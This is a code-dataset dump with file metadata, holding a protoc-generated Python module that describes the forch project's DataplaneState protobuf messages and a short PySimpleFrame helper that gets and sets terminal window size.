4c58e83542b12a6b151d76ec41d7ed0ec0f227dd | 26,727 | py | Python | forch/proto/dataplane_state_pb2.py | anurag6/forch | 4ee4173315637e43da0f4c2f1fc8dfb7709edf68 | [
"Apache-2.0"
] | 1 | 2019-12-12T23:13:24.000Z | 2019-12-12T23:13:24.000Z | forch/proto/dataplane_state_pb2.py | faucetsdn/forch | 1d49d5ac7e80974f3cb2d4cd6d12d33fc1166005 | [
"Apache-2.0"
] | 92 | 2019-12-13T03:30:35.000Z | 2021-11-11T16:16:13.000Z | forch/proto/dataplane_state_pb2.py | faucetsdn/forch | 1d49d5ac7e80974f3cb2d4cd6d12d33fc1166005 | [
"Apache-2.0"
] | 7 | 2020-01-11T14:12:46.000Z | 2021-01-25T17:30:55.000Z | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: forch/proto/dataplane_state.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from forch.proto import shared_constants_pb2 as forch_dot_proto_dot_shared__constants__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='forch/proto/dataplane_state.proto',
package='',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n!forch/proto/dataplane_state.proto\x1a\"forch/proto/shared_constants.proto\"\x97\n\n\x0e\x44\x61taplaneState\x12&\n\x06switch\x18\x01 \x01(\x0b\x32\x16.DataplaneState.Switch\x12$\n\x05stack\x18\x02 \x01(\x0b\x32\x15.DataplaneState.Links\x12&\n\x06\x65gress\x18\x03 \x01(\x0b\x32\x16.DataplaneState.Egress\x12)\n\x05vlans\x18\x04 \x03(\x0b\x32\x1a.DataplaneState.VlansEntry\x12%\n\x0f\x64\x61taplane_state\x18\x05 \x01(\x0e\x32\x0c.State.State\x12\x1e\n\x16\x64\x61taplane_state_detail\x18\x06 \x01(\t\x12$\n\x1c\x64\x61taplane_state_change_count\x18\x07 \x01(\x05\x12#\n\x1b\x64\x61taplane_state_last_change\x18\x08 \x01(\t\x12\x18\n\x10system_state_url\x18\t \x01(\t\x1aG\n\nVlansEntry\x12\x0b\n\x03key\x18\x01 \x01(\x05\x12(\n\x05value\x18\x02 \x01(\x0b\x32\x19.DataplaneState.VLANState:\x02\x38\x01\x1a\xd4\x01\n\x06Switch\x12\x36\n\x08switches\x18\x01 \x03(\x0b\x32$.DataplaneState.Switch.SwitchesEntry\x12!\n\x19switch_state_change_count\x18\x02 \x01(\x05\x12 \n\x18switch_state_last_change\x18\x03 \x01(\t\x1aM\n\rSwitchesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12+\n\x05value\x18\x02 \x01(\x0b\x32\x1c.DataplaneState.SwitchStatus:\x02\x38\x01\x1a\xb9\x01\n\x05Links\x12/\n\x05links\x18\x01 \x03(\x0b\x32 .DataplaneState.Links.LinksEntry\x12\x1a\n\x12links_change_count\x18\x02 \x01(\x05\x12\x19\n\x11links_last_change\x18\x03 \x01(\t\x1aH\n\nLinksEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12)\n\x05value\x18\x02 \x01(\x0b\x32\x1a.DataplaneState.LinkStatus:\x02\x38\x01\x1a\xc1\x02\n\x06\x45gress\x12\"\n\x0c\x65gress_state\x18\x01 \x01(\x0e\x32\x0c.State.State\x12\x1b\n\x13\x65gress_state_detail\x18\x02 \x01(\t\x12!\n\x19\x65gress_state_change_count\x18\x03 \x01(\x05\x12 \n\x18\x65gress_state_last_change\x18\x04 \x01(\t\x12 \n\x18\x65gress_state_last_update\x18\x05 \x01(\t\x12\x13\n\x0b\x61\x63tive_root\x18\x06 \x01(\t\x12\x30\n\x05links\x18\x07 \x03(\x0b\x32!.DataplaneState.Egress.LinksEntry\x1aH\n\nLinksEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12)\n\x05value\x18\x02 \x01(\x0b\x32\x1a.DataplaneState.LinkStatus:\x02\x38\x01\x1a\x32\n\x0cSwitchStatus\x12\"\n\x0cswitch_state\x18\x01 \x01(\x0e\x32\x0c.State.State\x1a.\n\nLinkStatus\x12 \n\nlink_state\x18\x01 \x01(\x0e\x32\x0c.State.State\x1a\x34\n\tVLANState\x12\'\n\x11packet_rate_state\x18\x01 \x01(\x0e\x32\x0c.State.Stateb\x06proto3')
,
dependencies=[forch_dot_proto_dot_shared__constants__pb2.DESCRIPTOR,])
_DATAPLANESTATE_VLANSENTRY = _descriptor.Descriptor(
name='VlansEntry',
full_name='DataplaneState.VlansEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='DataplaneState.VlansEntry.key', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='DataplaneState.VlansEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('8\001'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=425,
serialized_end=496,
)
_DATAPLANESTATE_SWITCH_SWITCHESENTRY = _descriptor.Descriptor(
name='SwitchesEntry',
full_name='DataplaneState.Switch.SwitchesEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='DataplaneState.Switch.SwitchesEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='DataplaneState.Switch.SwitchesEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('8\001'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=634,
serialized_end=711,
)
_DATAPLANESTATE_SWITCH = _descriptor.Descriptor(
name='Switch',
full_name='DataplaneState.Switch',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='switches', full_name='DataplaneState.Switch.switches', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='switch_state_change_count', full_name='DataplaneState.Switch.switch_state_change_count', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='switch_state_last_change', full_name='DataplaneState.Switch.switch_state_last_change', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_DATAPLANESTATE_SWITCH_SWITCHESENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=499,
serialized_end=711,
)
_DATAPLANESTATE_LINKS_LINKSENTRY = _descriptor.Descriptor(
name='LinksEntry',
full_name='DataplaneState.Links.LinksEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='DataplaneState.Links.LinksEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='DataplaneState.Links.LinksEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('8\001'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=827,
serialized_end=899,
)
_DATAPLANESTATE_LINKS = _descriptor.Descriptor(
name='Links',
full_name='DataplaneState.Links',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='links', full_name='DataplaneState.Links.links', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='links_change_count', full_name='DataplaneState.Links.links_change_count', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='links_last_change', full_name='DataplaneState.Links.links_last_change', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_DATAPLANESTATE_LINKS_LINKSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=714,
serialized_end=899,
)
_DATAPLANESTATE_EGRESS_LINKSENTRY = _descriptor.Descriptor(
name='LinksEntry',
full_name='DataplaneState.Egress.LinksEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='DataplaneState.Egress.LinksEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='DataplaneState.Egress.LinksEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('8\001'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=827,
serialized_end=899,
)
_DATAPLANESTATE_EGRESS = _descriptor.Descriptor(
name='Egress',
full_name='DataplaneState.Egress',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='egress_state', full_name='DataplaneState.Egress.egress_state', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='egress_state_detail', full_name='DataplaneState.Egress.egress_state_detail', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='egress_state_change_count', full_name='DataplaneState.Egress.egress_state_change_count', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='egress_state_last_change', full_name='DataplaneState.Egress.egress_state_last_change', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='egress_state_last_update', full_name='DataplaneState.Egress.egress_state_last_update', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='active_root', full_name='DataplaneState.Egress.active_root', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='links', full_name='DataplaneState.Egress.links', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_DATAPLANESTATE_EGRESS_LINKSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=902,
serialized_end=1223,
)
_DATAPLANESTATE_SWITCHSTATUS = _descriptor.Descriptor(
name='SwitchStatus',
full_name='DataplaneState.SwitchStatus',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='switch_state', full_name='DataplaneState.SwitchStatus.switch_state', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1225,
serialized_end=1275,
)
_DATAPLANESTATE_LINKSTATUS = _descriptor.Descriptor(
name='LinkStatus',
full_name='DataplaneState.LinkStatus',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='link_state', full_name='DataplaneState.LinkStatus.link_state', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1277,
serialized_end=1323,
)
_DATAPLANESTATE_VLANSTATE = _descriptor.Descriptor(
name='VLANState',
full_name='DataplaneState.VLANState',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='packet_rate_state', full_name='DataplaneState.VLANState.packet_rate_state', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1325,
serialized_end=1377,
)
_DATAPLANESTATE = _descriptor.Descriptor(
name='DataplaneState',
full_name='DataplaneState',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='switch', full_name='DataplaneState.switch', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='stack', full_name='DataplaneState.stack', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='egress', full_name='DataplaneState.egress', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='vlans', full_name='DataplaneState.vlans', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='dataplane_state', full_name='DataplaneState.dataplane_state', index=4,
number=5, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='dataplane_state_detail', full_name='DataplaneState.dataplane_state_detail', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='dataplane_state_change_count', full_name='DataplaneState.dataplane_state_change_count', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='dataplane_state_last_change', full_name='DataplaneState.dataplane_state_last_change', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='system_state_url', full_name='DataplaneState.system_state_url', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_DATAPLANESTATE_VLANSENTRY, _DATAPLANESTATE_SWITCH, _DATAPLANESTATE_LINKS, _DATAPLANESTATE_EGRESS, _DATAPLANESTATE_SWITCHSTATUS, _DATAPLANESTATE_LINKSTATUS, _DATAPLANESTATE_VLANSTATE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=74,
serialized_end=1377,
)
_DATAPLANESTATE_VLANSENTRY.fields_by_name['value'].message_type = _DATAPLANESTATE_VLANSTATE
_DATAPLANESTATE_VLANSENTRY.containing_type = _DATAPLANESTATE
_DATAPLANESTATE_SWITCH_SWITCHESENTRY.fields_by_name['value'].message_type = _DATAPLANESTATE_SWITCHSTATUS
_DATAPLANESTATE_SWITCH_SWITCHESENTRY.containing_type = _DATAPLANESTATE_SWITCH
_DATAPLANESTATE_SWITCH.fields_by_name['switches'].message_type = _DATAPLANESTATE_SWITCH_SWITCHESENTRY
_DATAPLANESTATE_SWITCH.containing_type = _DATAPLANESTATE
_DATAPLANESTATE_LINKS_LINKSENTRY.fields_by_name['value'].message_type = _DATAPLANESTATE_LINKSTATUS
_DATAPLANESTATE_LINKS_LINKSENTRY.containing_type = _DATAPLANESTATE_LINKS
_DATAPLANESTATE_LINKS.fields_by_name['links'].message_type = _DATAPLANESTATE_LINKS_LINKSENTRY
_DATAPLANESTATE_LINKS.containing_type = _DATAPLANESTATE
_DATAPLANESTATE_EGRESS_LINKSENTRY.fields_by_name['value'].message_type = _DATAPLANESTATE_LINKSTATUS
_DATAPLANESTATE_EGRESS_LINKSENTRY.containing_type = _DATAPLANESTATE_EGRESS
_DATAPLANESTATE_EGRESS.fields_by_name['egress_state'].enum_type = forch_dot_proto_dot_shared__constants__pb2._STATE_STATE
_DATAPLANESTATE_EGRESS.fields_by_name['links'].message_type = _DATAPLANESTATE_EGRESS_LINKSENTRY
_DATAPLANESTATE_EGRESS.containing_type = _DATAPLANESTATE
_DATAPLANESTATE_SWITCHSTATUS.fields_by_name['switch_state'].enum_type = forch_dot_proto_dot_shared__constants__pb2._STATE_STATE
_DATAPLANESTATE_SWITCHSTATUS.containing_type = _DATAPLANESTATE
_DATAPLANESTATE_LINKSTATUS.fields_by_name['link_state'].enum_type = forch_dot_proto_dot_shared__constants__pb2._STATE_STATE
_DATAPLANESTATE_LINKSTATUS.containing_type = _DATAPLANESTATE
_DATAPLANESTATE_VLANSTATE.fields_by_name['packet_rate_state'].enum_type = forch_dot_proto_dot_shared__constants__pb2._STATE_STATE
_DATAPLANESTATE_VLANSTATE.containing_type = _DATAPLANESTATE
_DATAPLANESTATE.fields_by_name['switch'].message_type = _DATAPLANESTATE_SWITCH
_DATAPLANESTATE.fields_by_name['stack'].message_type = _DATAPLANESTATE_LINKS
_DATAPLANESTATE.fields_by_name['egress'].message_type = _DATAPLANESTATE_EGRESS
_DATAPLANESTATE.fields_by_name['vlans'].message_type = _DATAPLANESTATE_VLANSENTRY
_DATAPLANESTATE.fields_by_name['dataplane_state'].enum_type = forch_dot_proto_dot_shared__constants__pb2._STATE_STATE
DESCRIPTOR.message_types_by_name['DataplaneState'] = _DATAPLANESTATE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
DataplaneState = _reflection.GeneratedProtocolMessageType('DataplaneState', (_message.Message,), dict(
VlansEntry = _reflection.GeneratedProtocolMessageType('VlansEntry', (_message.Message,), dict(
DESCRIPTOR = _DATAPLANESTATE_VLANSENTRY,
__module__ = 'forch.proto.dataplane_state_pb2'
# @@protoc_insertion_point(class_scope:DataplaneState.VlansEntry)
))
,
Switch = _reflection.GeneratedProtocolMessageType('Switch', (_message.Message,), dict(
SwitchesEntry = _reflection.GeneratedProtocolMessageType('SwitchesEntry', (_message.Message,), dict(
DESCRIPTOR = _DATAPLANESTATE_SWITCH_SWITCHESENTRY,
__module__ = 'forch.proto.dataplane_state_pb2'
# @@protoc_insertion_point(class_scope:DataplaneState.Switch.SwitchesEntry)
))
,
DESCRIPTOR = _DATAPLANESTATE_SWITCH,
__module__ = 'forch.proto.dataplane_state_pb2'
# @@protoc_insertion_point(class_scope:DataplaneState.Switch)
))
,
Links = _reflection.GeneratedProtocolMessageType('Links', (_message.Message,), dict(
LinksEntry = _reflection.GeneratedProtocolMessageType('LinksEntry', (_message.Message,), dict(
DESCRIPTOR = _DATAPLANESTATE_LINKS_LINKSENTRY,
__module__ = 'forch.proto.dataplane_state_pb2'
# @@protoc_insertion_point(class_scope:DataplaneState.Links.LinksEntry)
))
,
DESCRIPTOR = _DATAPLANESTATE_LINKS,
__module__ = 'forch.proto.dataplane_state_pb2'
# @@protoc_insertion_point(class_scope:DataplaneState.Links)
))
,
Egress = _reflection.GeneratedProtocolMessageType('Egress', (_message.Message,), dict(
LinksEntry = _reflection.GeneratedProtocolMessageType('LinksEntry', (_message.Message,), dict(
DESCRIPTOR = _DATAPLANESTATE_EGRESS_LINKSENTRY,
__module__ = 'forch.proto.dataplane_state_pb2'
# @@protoc_insertion_point(class_scope:DataplaneState.Egress.LinksEntry)
))
,
DESCRIPTOR = _DATAPLANESTATE_EGRESS,
__module__ = 'forch.proto.dataplane_state_pb2'
# @@protoc_insertion_point(class_scope:DataplaneState.Egress)
))
,
SwitchStatus = _reflection.GeneratedProtocolMessageType('SwitchStatus', (_message.Message,), dict(
DESCRIPTOR = _DATAPLANESTATE_SWITCHSTATUS,
__module__ = 'forch.proto.dataplane_state_pb2'
# @@protoc_insertion_point(class_scope:DataplaneState.SwitchStatus)
))
,
LinkStatus = _reflection.GeneratedProtocolMessageType('LinkStatus', (_message.Message,), dict(
DESCRIPTOR = _DATAPLANESTATE_LINKSTATUS,
__module__ = 'forch.proto.dataplane_state_pb2'
# @@protoc_insertion_point(class_scope:DataplaneState.LinkStatus)
))
,
VLANState = _reflection.GeneratedProtocolMessageType('VLANState', (_message.Message,), dict(
DESCRIPTOR = _DATAPLANESTATE_VLANSTATE,
__module__ = 'forch.proto.dataplane_state_pb2'
# @@protoc_insertion_point(class_scope:DataplaneState.VLANState)
))
,
DESCRIPTOR = _DATAPLANESTATE,
__module__ = 'forch.proto.dataplane_state_pb2'
# @@protoc_insertion_point(class_scope:DataplaneState)
))
_sym_db.RegisterMessage(DataplaneState)
_sym_db.RegisterMessage(DataplaneState.VlansEntry)
_sym_db.RegisterMessage(DataplaneState.Switch)
_sym_db.RegisterMessage(DataplaneState.Switch.SwitchesEntry)
_sym_db.RegisterMessage(DataplaneState.Links)
_sym_db.RegisterMessage(DataplaneState.Links.LinksEntry)
_sym_db.RegisterMessage(DataplaneState.Egress)
_sym_db.RegisterMessage(DataplaneState.Egress.LinksEntry)
_sym_db.RegisterMessage(DataplaneState.SwitchStatus)
_sym_db.RegisterMessage(DataplaneState.LinkStatus)
_sym_db.RegisterMessage(DataplaneState.VLANState)
_DATAPLANESTATE_VLANSENTRY._options = None
_DATAPLANESTATE_SWITCH_SWITCHESENTRY._options = None
_DATAPLANESTATE_LINKS_LINKSENTRY._options = None
_DATAPLANESTATE_EGRESS_LINKSENTRY._options = None
# @@protoc_insertion_point(module_scope)
| 42.023585 | 2,324 | 0.759494 | 3,283 | 26,727 | 5.842217 | 0.06488 | 0.045881 | 0.050469 | 0.034411 | 0.727112 | 0.660532 | 0.627789 | 0.606674 | 0.592336 | 0.590615 | 0 | 0.036142 | 0.122124 | 26,727 | 635 | 2,325 | 42.089764 | 0.781315 | 0.032738 | 0 | 0.672355 | 1 | 0.001706 | 0.192483 | 0.158113 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.010239 | 0 | 0.010239 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4c59d19957b86ef98f2ea001d545126ff11119ff | 757 | py | Python | pysimpleframe/interface/display/Bounds.py | OriDevTeam/PySimpleFrame | 105654736a0ecc2ddb00921f1bc139faeaba2c84 | [
"BSD-3-Clause"
] | null | null | null | pysimpleframe/interface/display/Bounds.py | OriDevTeam/PySimpleFrame | 105654736a0ecc2ddb00921f1bc139faeaba2c84 | [
"BSD-3-Clause"
] | null | null | null | pysimpleframe/interface/display/Bounds.py | OriDevTeam/PySimpleFrame | 105654736a0ecc2ddb00921f1bc139faeaba2c84 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Name: TOFILL\n
Description: TOFILL
"""
"""PySimpleFrame
Author: Miguel Silva
License: Check LICENSE file
"""
## System imports ##
import os
import sys
## Library imports ##
from colorama import Fore, Back, Style
## Application imports ##
class CLI:
def GetBounds():
## Get the bounds of the terminal window
rows, columns = os.popen('stty size', 'r').read().split()
## Return the bounds
return rows, columns
def SetBounds(rows, cols):
## Set the bounds of the terminal window
sys.stdout.write(f"\x1b[8;{rows};{cols}t")
class CLIWindows:
def SetBounds(rows, cols):
## Set the bounds of the terminal window in Windows
os.system(f'mode con: cols={cols} lines={rows}')
| 19.410256 | 59 | 0.667107 | 106 | 757 | 4.764151 | 0.59434 | 0.071287 | 0.065347 | 0.083168 | 0.257426 | 0.257426 | 0.20198 | 0.20198 | 0.20198 | 0.20198 | 0 | 0.004886 | 0.188904 | 757 | 38 | 60 | 19.921053 | 0.81759 | 0.360634 | 0 | 0.166667 | 0 | 0 | 0.174263 | 0.0563 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.